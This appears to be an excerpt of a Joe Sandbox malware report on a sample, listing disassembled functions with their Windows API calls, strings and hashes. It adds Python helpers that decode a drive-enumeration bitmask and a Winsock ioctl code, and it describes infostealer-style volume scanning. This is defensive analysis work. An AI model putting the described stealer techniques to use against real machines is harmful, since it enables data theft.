                                                      • Opcode Fuzzy Hash: 7732952b28f8e0c600fdc7128a2c7702d20d91c87a3ff2a35ca899d7babf8f00
                                                      • Instruction Fuzzy Hash: 56B1B0706047469FEB10CF24C885FBA7BA4BF95318F048A2DE8994B2D2DB70EC44C761

                                                       Control-flow Graph (graph image not captured): basic blocks 4d2f17-4d31d6; Windows APIs referenced: RegOpenKeyExA, RegEnumKeyExA, RegQueryValueExA, RegCloseKey
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: CloseEnumOpen
                                                      • String ID: d
                                                      • API String ID: 1332880857-2564639436
                                                      • Opcode ID: 9ecfb9d26f3533ab420c80da2b897976bbf0060522607bd7b9c4605e27e41892
                                                      • Instruction ID: cd5d36709c6ce8078ec6bb15565a0fe0a5196efb3fc54f63120671b9a17fc14b
                                                      • Opcode Fuzzy Hash: 9ecfb9d26f3533ab420c80da2b897976bbf0060522607bd7b9c4605e27e41892
                                                      • Instruction Fuzzy Hash: 9371B3B4904319DFDB10EF69C58479EBBF0BF84318F10886DE89897351E7749A888F92

                                                       Control-flow Graph (graph image not captured): basic blocks 4d76a0-4d7762; Windows API referenced: send
                                                      APIs
                                                      • send.WS2_32(multi.c,?,?,?,N=M,00000000,?,?,004E07BF), ref: 004D76EB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: send
                                                      • String ID: LIMIT %s:%d %s reached memlimit$N=M$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                      • API String ID: 2809346765-2691544196
                                                      • Opcode ID: eb2afd0ae4cac2f8327d7bd5aa321682680d5cbad91d7725ad77818414ae2371
                                                      • Instruction ID: 4f0301e75c78507f0b5685a66c84304b7f5f9d4d56be5d4425b9c6d17649abce
                                                      • Opcode Fuzzy Hash: eb2afd0ae4cac2f8327d7bd5aa321682680d5cbad91d7725ad77818414ae2371
                                                      • Instruction Fuzzy Hash: E7110AF1A09344BFD520AB59AC5AD277BACDBC1B6CF44091BF80563342F5A5DC0187B6

                                                       Control-flow Graph (graph image not captured): basic blocks 509290-509470; Windows APIs referenced: WSAIoctl, setsockopt
                                                      APIs
                                                      • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0050935D
                                                      • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00509388
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: Ioctlsetsockopt
                                                      • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                      • API String ID: 1903391676-2691795271
                                                      • Opcode ID: 1f36c80e4ddf52394f4a7437a3d71b20c8ab476e6a4cf6e641e2f297380e30aa
                                                      • Instruction ID: 2c16a2a617d917bd84b43416a33b381d499c41c0bcd7bedbd55ae362d508bff4
                                                      • Opcode Fuzzy Hash: 1f36c80e4ddf52394f4a7437a3d71b20c8ab476e6a4cf6e641e2f297380e30aa
                                                      • Instruction Fuzzy Hash: 1451D370604305ABDB11DF24C885FAABBA5FF84318F148529FD489B2C7E770E951CB91

                                                       Control-flow Graph (graph image not captured): basic blocks 85d1b0-85dcf3; C runtime API referenced: localeconv
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$Inf$NaN
                                                      • API String ID: 0-141429178
                                                      • Opcode ID: 54bdcd825961c6b79a6f66b4e5f6e9561378d80092b7bbcbd22e45b604535362
                                                      • Instruction ID: a4f139d5ed4c4541d005d1d72410d3a9e674c3d54aa553f049fbe98897b3e0fe
                                                      • Opcode Fuzzy Hash: 54bdcd825961c6b79a6f66b4e5f6e9561378d80092b7bbcbd22e45b604535362
                                                      • Instruction Fuzzy Hash: EEF18C7160C3958BD7319F24C0407ABBBE2FB85316F158A6DECD9C7382D735990A8B82

                                                       Control-flow Graph (graph image not captured): basic blocks 4d7770-4d7832; Windows API referenced: recv
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: recv
                                                      • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                      • API String ID: 1507349165-640788491
                                                      • Opcode ID: 59e5f771d06ffd3647e6ff3d63db6df5609d43a5a53032110fec693f142cf49e
                                                      • Instruction ID: 3d81d6cb7eb477474f6c539baef5a669f711b2f8fe3df6c9336151252bfe0349
                                                      • Opcode Fuzzy Hash: 59e5f771d06ffd3647e6ff3d63db6df5609d43a5a53032110fec693f142cf49e
                                                      • Instruction Fuzzy Hash: 041127B4A09344BBD120EB199C5AE377B9CDBC5B6CF44492BF80593342F165AC0182B2

                                                       Control-flow Graph (graph image not captured): basic blocks 4d75e0-4d7699; Windows API referenced: socket
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: socket
                                                      • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                      • API String ID: 98920635-842387772
                                                      • Opcode ID: 77479ab8efc35e9f471b974b8da7932ebc594810aae2d20f8d81ae4a6b198af3
                                                      • Instruction ID: 288376ad4e6c2f3b39cb938c3bfb348afbcf0e9330972f4b0b64ba7fce425217
                                                      • Opcode Fuzzy Hash: 77479ab8efc35e9f471b974b8da7932ebc594810aae2d20f8d81ae4a6b198af3
                                                      • Instruction Fuzzy Hash: 3A118CB1B01211A7DA206B6D6C26E9B3B98DFC1778F440927F800D3392F262CC54C3E1

                                                       Control-flow Graph (rendered graph not preserved; basic blocks and edges recovered from it)
                                                       • 71502f2-7150469: calls GetLogicalDrives, then -> 715046a
                                                       • 715046a-71506c8: call 71506d8, then -> 71506ca or -> 715071b
                                                       • 71506ca-71506d7: no further edges
                                                       • 715071b-715071f: -> 7150721 or -> 7150726
                                                       • 7150721-7150725: -> 7150726
                                                       • 7150726-715075b: no further edges
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE(?,07150081,07150081), ref: 07150462
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1397951528.0000000007150000.00000040.00001000.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7150000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\$A:\
                                                      • API String ID: 999431828-1047444362
                                                      • Opcode ID: a8ec3d381e852b3609dd84c16903f9e4ed0f91f63c4cd11cbdd56b72651742b3
                                                      • Instruction ID: 032cc638cbac0e380e201eea28e780d49604f750b2e5763b40b874edd2cde302
                                                      • Opcode Fuzzy Hash: a8ec3d381e852b3609dd84c16903f9e4ed0f91f63c4cd11cbdd56b72651742b3
                                                      • Instruction Fuzzy Hash: FD516AEB26C121FDB14985E62B54AFB576DE2DB730B32882BFC27D1582E3884E495131
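                                                       The GetLogicalDrives records in this region all carry the single template string "A:\": the pattern indicates a loop over the drive bitmask returned by GetLogicalDrives that rewrites the drive letter for each set bit, the usual way an infostealer enumerates volumes before scanning them. The following Python is an editorial example added to this report, not part of the Joe Sandbox output or the sample; it reproduces that enumeration offline from a constructed bitmask and handles the zero return value that signals a failed call.

```python
# Expand a GetLogicalDrives() bitmask into drive root paths, the way the
# function above does with its "A:\" template string.
# Editorial example for this report; not code from the sample or Joe Sandbox.

DRIVE_TEMPLATE = "A:\\"   # literal carried by the sample; bit 0 = A:, bit 1 = B:, ...


def drive_roots(mask):
    """Return a root path for every set bit of the 26-bit mask.

    GetLogicalDrives returns 0 on failure, so an empty mask is an error, not
    'no drives'."""
    if mask == 0:
        raise ValueError("GetLogicalDrives returned 0 (call failed)")
    roots = []
    for bit in range(26):                               # A .. Z
        if mask & (1 << bit):
            # patch the first character of the template, as the loop would
            roots.append(chr(ord(DRIVE_TEMPLATE[0]) + bit) + DRIVE_TEMPLATE[1:])
    return roots


def drive_mask(letters):
    """Inverse helper: the mask an analysis VM exposing these letters returns."""
    mask = 0
    for letter in letters.upper():
        mask |= 1 << (ord(letter) - ord("A"))
    return mask


# Constructed mask for illustration: bits 2, 3, 4 set = C:, D:, E: (0x1C).
EXAMPLE_MASK = 0x1C

if __name__ == "__main__":
    print(drive_roots(EXAMPLE_MASK))        # ['C:\\', 'D:\\', 'E:\\']
    print(hex(drive_mask("CDE")))           # 0x1c
```

                                                       Running the helper against the letters your analysis VM actually exposes tells you which roots the sample's loop will visit, and therefore which paths to watch in the file-access trace.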

                                                       Control-flow Graph (rendered graph not preserved; basic blocks and edges recovered from it)
                                                       • 71502f0-7150469: calls GetLogicalDrives, then -> 715046a
                                                       • 715046a-71506c8: call 71506d8, then -> 71506ca or -> 715071b
                                                       • 71506ca-71506d7: no further edges
                                                       • 715071b-715071f: -> 7150721 or -> 7150726
                                                       • 7150721-7150725: -> 7150726
                                                       • 7150726-715075b: no further edges
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE(?,07150081,07150081), ref: 07150462
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1397951528.0000000007150000.00000040.00001000.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7150000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\$A:\
                                                      • API String ID: 999431828-1047444362
                                                      • Opcode ID: f96c8bda7fa665ad8934a24c17a5fd3101531ee03943fcc8b020e13f2770f5ae
                                                      • Instruction ID: 33a2a4cfe920f7819cbbb9a1f2b04a132fb57cfac701e59a668fd3a04b2a9ac8
                                                      • Opcode Fuzzy Hash: f96c8bda7fa665ad8934a24c17a5fd3101531ee03943fcc8b020e13f2770f5ae
                                                      • Instruction Fuzzy Hash: 83516BEB26C121FDB14A85E62B14AFB576DE5CB730B32842AFC17D1582E3984F4D1131

                                                       Control-flow Graph (rendered graph not preserved; basic blocks and edges recovered from it)
                                                       • 7150304-7150469: calls GetLogicalDrives, then -> 715046a
                                                       • 715046a-71506c8: call 71506d8, then -> 71506ca or -> 715071b
                                                       • 71506ca-71506d7: no further edges
                                                       • 715071b-715071f: -> 7150721 or -> 7150726
                                                       • 7150721-7150725: -> 7150726
                                                       • 7150726-715075b: no further edges
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE(?,07150081,07150081), ref: 07150462
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1397951528.0000000007150000.00000040.00001000.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7150000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\$A:\
                                                      • API String ID: 999431828-1047444362
                                                      • Opcode ID: a040d5670bdf26481c166de3b54c90b68a28f2db7903300bb1b1e4fd74fe6638
                                                      • Instruction ID: d93300249991a6e3bb05a55cae5342baa47a0de720a89b8fec5f0ddd08c1e550
                                                      • Opcode Fuzzy Hash: a040d5670bdf26481c166de3b54c90b68a28f2db7903300bb1b1e4fd74fe6638
                                                      • Instruction Fuzzy Hash: 47515BEB26C121FDB14985E22B14AFB576DE6DB730B32882AFC27D5582E3984F4D1131
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE(?,07150081,07150081), ref: 07150462
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1397951528.0000000007150000.00000040.00001000.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7150000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\$A:\
                                                      • API String ID: 999431828-1047444362
                                                      • Opcode ID: f22184f73f60266730cadf69355ecab723efe577ec348299ed3b5e44428581f1
                                                      • Instruction ID: a31042a251978ea6c711eb4b8729c7bc265eca4e80af50cd5121089e2fe11003
                                                      • Opcode Fuzzy Hash: f22184f73f60266730cadf69355ecab723efe577ec348299ed3b5e44428581f1
                                                      • Instruction Fuzzy Hash: 63517CEB268111FDB14985E22B14AFB576DE6DB730B32882AFC27D6582E3984F4D1131
                                                      APIs
                                                      • getsockname.WS2_32(?,?,00000080), ref: 0050A1C7
                                                      Strings
                                                      • getsockname() failed with errno %d: %s, xrefs: 0050A1F0
                                                      • ssloc inet_ntop() failed with errno %d: %s, xrefs: 0050A23B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1395770755.0000000000D74000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1395770755.0000000000D78000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1395770755.0000000000E4F000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1395770755.0000000000E59000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1395770755.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1396065369.0000000000E68000.00000080.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1396176817.0000000001018000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1396196650.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1396213416.000000000101B000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: getsockname
                                                      • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                      • API String ID: 3358416759-2605427207
                                                      • Opcode ID: 73f7b2ef148a4f38577bcc93578d127f8237221adb6ecdc58fc9ed920ad69c85
                                                      • Instruction ID: f0c15db37c2c9e3dba72760a7a0c10c354b733163710d0e772b835a52214c2fd
                                                      • Opcode Fuzzy Hash: 73f7b2ef148a4f38577bcc93578d127f8237221adb6ecdc58fc9ed920ad69c85
                                                      • Instruction Fuzzy Hash: EC21FB31808781AAF7269729DC46FE777ACEFD1328F040615F98853191FB32698687E2
                                                      APIs
                                                      • WSAStartup.WS2_32(00000202), ref: 004ED65B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1395770755.0000000000D74000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1395770755.0000000000D78000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1395770755.0000000000E4F000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1395770755.0000000000E59000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1395770755.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1396065369.0000000000E68000.00000080.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1396176817.0000000001018000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1396196650.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1396213416.000000000101B000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: Startup
                                                      • String ID: if_nametoindex$iphlpapi.dll
                                                      • API String ID: 724789610-3097795196
                                                      • Opcode ID: d26b8a524023d2bede29668163b1625f3bfff98738a50af7fb0b3d2c42231836
                                                      • Instruction ID: 1b8c368adb1301b24d3a8efa761bf8de979e1c1cd94111043e54623877ed242b
                                                      • Opcode Fuzzy Hash: d26b8a524023d2bede29668163b1625f3bfff98738a50af7fb0b3d2c42231836
                                                      • Instruction Fuzzy Hash: 5F017BD0D413805BFB01A73D9D1B32736905B91308F48087AE869832C3F72DC948C292
                                                      APIs
                                                      • socket.WS2_32(FFFFFFFF,?,00000000), ref: 0059AB9B
                                                      • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0059ABE4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1395770755.0000000000D74000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1395770755.0000000000D78000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1395770755.0000000000E4F000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1395770755.0000000000E59000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1395770755.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1396065369.0000000000E68000.00000080.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1396176817.0000000001018000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1396196650.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1396213416.000000000101B000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: ioctlsocketsocket
                                                      • String ID:
                                                      • API String ID: 416004797-0
                                                      • Opcode ID: c0b42246b66c9aadf409b2f5398490b7f9d4b2fa5d0f5050cabb7c0ea48bd5de
                                                      • Instruction ID: 46ab826a019e62b741bfbab17816a15b48563d173019631f9e46102716c7c90c
                                                      • Opcode Fuzzy Hash: c0b42246b66c9aadf409b2f5398490b7f9d4b2fa5d0f5050cabb7c0ea48bd5de
                                                      • Instruction Fuzzy Hash: C1E1AF706043029BEF20CF24C885B6BBBA5FF85314F144A2DF9999B291E775DD44CBA2
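                                                       The Winsock records from the 004D0000 image in this region (socket() followed by ioctlsocket(…, 8004667E, 1), getsockname() with the "ssloc inet_ntop() failed with errno %d: %s" string, WSAStartup(0202) next to the if_nametoindex lookup in iphlpapi.dll, and the "FD %s:%d socket() = %d" / "reached memlimit" strings) match the diagnostic strings of libcurl's connect, Windows-init and memory-debug code, so they are most plausibly statically linked library plumbing rather than the stealer's own logic; the sample-specific behaviour is in the GetLogicalDrives and anti-analysis functions. The control code 8004667E is worth decoding once: the Python below is an editorial example added to this report, not code from the sample or from Joe Sandbox. It unpacks a Winsock ioctl code into direction, argument size, group and command number using the BSD-style encoding from winsock2.h, names the common codes, and treats the logged third argument 00000001 as the value the u_long pointer refers to (an assumption about how the sandbox prints it); 8004667E comes out as FIONBIO with a non-zero argument, i.e. the socket is switched to non-blocking mode, the normal preparation for a connect() with a timeout.

```python
# Decode Winsock ioctlsocket() control codes such as 8004667E seen above.
# Editorial example for this report; not code from the sample or Joe Sandbox.
#
# Encoding (winsock2.h, same as BSD ioccom.h):
#   bit 31      IOC_IN    argument is copied in
#   bit 30      IOC_OUT   argument is copied out
#   bit 29      IOC_VOID  no argument
#   bits 16-22  argument size (IOCPARM_MASK = 0x7F)
#   bits 8-15   group character ('f' for FIO*, 's' for SIO*)
#   bits 0-7    command number

IOC_VOID = 0x20000000
IOC_OUT = 0x40000000
IOC_IN = 0x80000000
IOCPARM_MASK = 0x7F


def ioc(direction, group, number, size):
    """Rebuild a code the way the _IO/_IOR/_IOW macros do."""
    return direction | ((size & IOCPARM_MASK) << 16) | (ord(group) << 8) | number


# The codes an analyst meets most often in sample triage (all take a u_long).
KNOWN_CODES = {
    ioc(IOC_IN, "f", 126, 4): "FIONBIO",     # set/clear non-blocking mode
    ioc(IOC_OUT, "f", 127, 4): "FIONREAD",   # bytes available to read
    ioc(IOC_OUT, "s", 7, 4): "SIOCATMARK",   # at out-of-band mark
}


def decode_ioctl(code):
    """Split a control code into its fields and name it if known."""
    directions = [name for bit, name in ((IOC_IN, "IOC_IN"), (IOC_OUT, "IOC_OUT"),
                                         (IOC_VOID, "IOC_VOID")) if code & bit]
    return {
        "name": KNOWN_CODES.get(code, "unknown"),
        "direction": "|".join(directions) or "none",
        "arg_size": (code >> 16) & IOCPARM_MASK,
        "group": chr((code >> 8) & 0xFF),
        "number": code & 0xFF,
    }


def describe_call(code, argp_value):
    """One-line reading of ioctlsocket(s, code, argp) as the sandbox logs it.

    argp_value is taken to be the u_long the third parameter points to."""
    fields = decode_ioctl(code)
    if fields["name"] == "FIONBIO":
        mode = "non-blocking" if argp_value else "blocking"
        return f"FIONBIO: switch socket to {mode} mode"
    return (f"{fields['name']} ({fields['direction']}, group {fields['group']!r}, "
            f"cmd {fields['number']}, {fields['arg_size']}-byte arg)")


if __name__ == "__main__":
    # The call recorded in the report: ioctlsocket(0, 8004667E, 1)
    print(decode_ioctl(0x8004667E))
    print(describe_call(0x8004667E, 1))   # FIONBIO: switch socket to non-blocking mode
```

                                                       Extend KNOWN_CODES with the SIO_* codes from mswsock.h if a sample uses WSAIoctl as well; the field decoder needs no change because those codes use the same layout.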
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE(?,07150081,07150081), ref: 07150462
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1397951528.0000000007150000.00000040.00001000.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7150000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: e0f722eb0f042d033eac558e127a173772886a3d91e4741bc51c6fc15e100751
                                                      • Instruction ID: 01edb2f282f46706888acc08ffcf4c139b56abfdb83c894c906c89888e85942a
                                                      • Opcode Fuzzy Hash: e0f722eb0f042d033eac558e127a173772886a3d91e4741bc51c6fc15e100751
                                                      • Instruction Fuzzy Hash: 35516CEB26C121FDB14A85E22B14AFB576DE1CB730B328826FC27D5582E3884F4D5131
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE(?,07150081,07150081), ref: 07150462
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1397951528.0000000007150000.00000040.00001000.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7150000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: 2dfdc0ff0d796ba20e7e4218b46eb4aca984b30edc4371a600dcc5693404f7ab
                                                      • Instruction ID: 7928d5d78cd72b7c7b7dc7d9126a27670940617d73ce8a961ffd0134296e2b37
                                                      • Opcode Fuzzy Hash: 2dfdc0ff0d796ba20e7e4218b46eb4aca984b30edc4371a600dcc5693404f7ab
                                                      • Instruction Fuzzy Hash: 6E519DFB268110FDB14985A12B14AFB576DE2CB730B32842AFC27D6582E3884F4D1131
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE(?,07150081,07150081), ref: 07150462
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1397951528.0000000007150000.00000040.00001000.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7150000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: 2a2ff59566dad44f265b3dc6a98f0457bd1b4f97ece5ac1bfbab022df6f03c14
                                                      • Instruction ID: 5baf7f4eb2683e6b24070095ba33eb0e1863c7116b565118637bf57b4d93f1b5
                                                      • Opcode Fuzzy Hash: 2a2ff59566dad44f265b3dc6a98f0457bd1b4f97ece5ac1bfbab022df6f03c14
                                                      • Instruction Fuzzy Hash: E2519CEB268111FD714E85E22B14AFB5B6DE1CB730B32882AFC27D5582E3884E5A1131
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE(?,07150081,07150081), ref: 07150462
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1397951528.0000000007150000.00000040.00001000.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7150000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: e06ba419fdadf57542c3b3f5dceea118a474e3d270600d32c70702d5e46d918b
                                                      • Instruction ID: 11618f6a1650b47cbe7156586f5cea56fb4959cb85583641781dd52a2275b60b
                                                      • Opcode Fuzzy Hash: e06ba419fdadf57542c3b3f5dceea118a474e3d270600d32c70702d5e46d918b
                                                      • Instruction Fuzzy Hash: 5E516CEB268111FDB14E85E12B14AFB576DE1CB730B328826FC27D5582E3884F5D1131
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE(?,07150081,07150081), ref: 07150462
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1397951528.0000000007150000.00000040.00001000.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7150000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: 9ee50ab1fbb83203fa2fdf4235d79746c837bf79fe36e54fa88f1969b994b9a3
